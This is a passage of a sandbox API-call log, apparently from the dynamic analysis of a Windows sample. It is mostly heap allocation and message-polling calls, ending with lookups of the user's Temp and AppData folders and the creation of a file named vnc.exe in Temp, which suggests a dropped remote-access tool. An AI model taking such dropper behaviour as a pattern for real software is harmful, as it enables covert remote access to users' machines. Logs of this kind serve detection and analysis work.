hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd508 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff410 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd988 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefb0 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef990 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2f8 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff348 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.850] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0122.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0122.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0122.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.851] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.851] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x65600) returned 0x14bffb0 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bde68 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff000 | out: hHeap=0x12c0000) returned 1 [0122.871] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0122.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd448 [0122.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0122.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0122.871] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x65600) returned 0x154cd98 [0122.881] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bffb0 | out: hHeap=0x12c0000) returned 1 [0122.887] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.887] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0122.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0122.888] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.888] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.888] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.888] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.889] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0122.889] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.889] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.889] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458dd8 [0122.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458dd8 | out: hHeap=0x12c0000) returned 1 [0122.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d18 [0122.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0122.890] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0122.890] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918b8 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918b8 | out: hHeap=0x12c0000) returned 1 [0122.890] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0122.891] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1b8 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.891] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6d0 [0122.891] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0122.891] CharUpperBuffW (in: lpsz="GETDIR", cchLength=0x6 | out: lpsz="GETDIR") returned 0x6 [0122.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef840 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd6a0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a35c8 [0122.892] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.892] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6d0 [0122.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.893] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff000 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458d58 [0122.893] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300d20 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.893] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0122.894] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0122.894] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff280 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1302b30 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd520 [0122.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x133c8a0 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.895] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7def88 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x14906d0 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef950 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x1490b48 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x133c8a0 [0122.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef900 [0122.895] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7ded68 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0122.904] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd988 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x14904c0 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x133c8a0 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef920 [0122.905] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.905] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.905] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.905] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.905] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.905] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.905] PeekMessageW (in: lpMsg=0x7df674, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df674) returned 0 [0122.906] GetLastError () returned 0x3f0 [0122.906] SetLastError (dwErrCode=0x3f0) [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.906] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.908] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\vnc.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 